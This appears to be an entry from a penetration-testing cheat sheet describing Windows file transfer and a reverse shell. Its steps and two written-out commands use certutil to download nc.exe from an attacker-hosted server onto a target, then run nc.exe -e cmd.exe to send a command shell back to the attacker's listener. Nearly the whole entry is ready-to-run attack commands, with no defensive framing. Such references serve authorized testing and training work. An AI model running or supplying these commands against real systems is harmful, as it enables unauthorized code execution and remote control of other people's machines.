← Back to search

Windows File Transfer (certutil / nc)

Pivoting & Transferwindowstool

Summary

Downloads a binary onto a Windows host with certutil, then uses the transferred nc.exe to spawn a reverse shell back to the attacker.

Walkthrough

Use certutil as a built-in downloader to pull tools onto a Windows target, then run them.

Steps

  • Host the file (e.g. nc.exe) on your attacker machine's web server.
  • Download it with certutil -urlcache -split -f to a writable path like C:/Users/Public/Documents.
  • Run the transferred nc.exe -e cmd.exe <IP> 4444 to send a reverse shell to your listener.

Commands

cmd

certutil -urlcache -split -f http://<IP>:80/nc.exe C:/Users/Public/Documents/nc.exe

cmd

cmd.exe /c C:/Users/Public/Documents/nc.exe -e cmd.exe <IP> 4444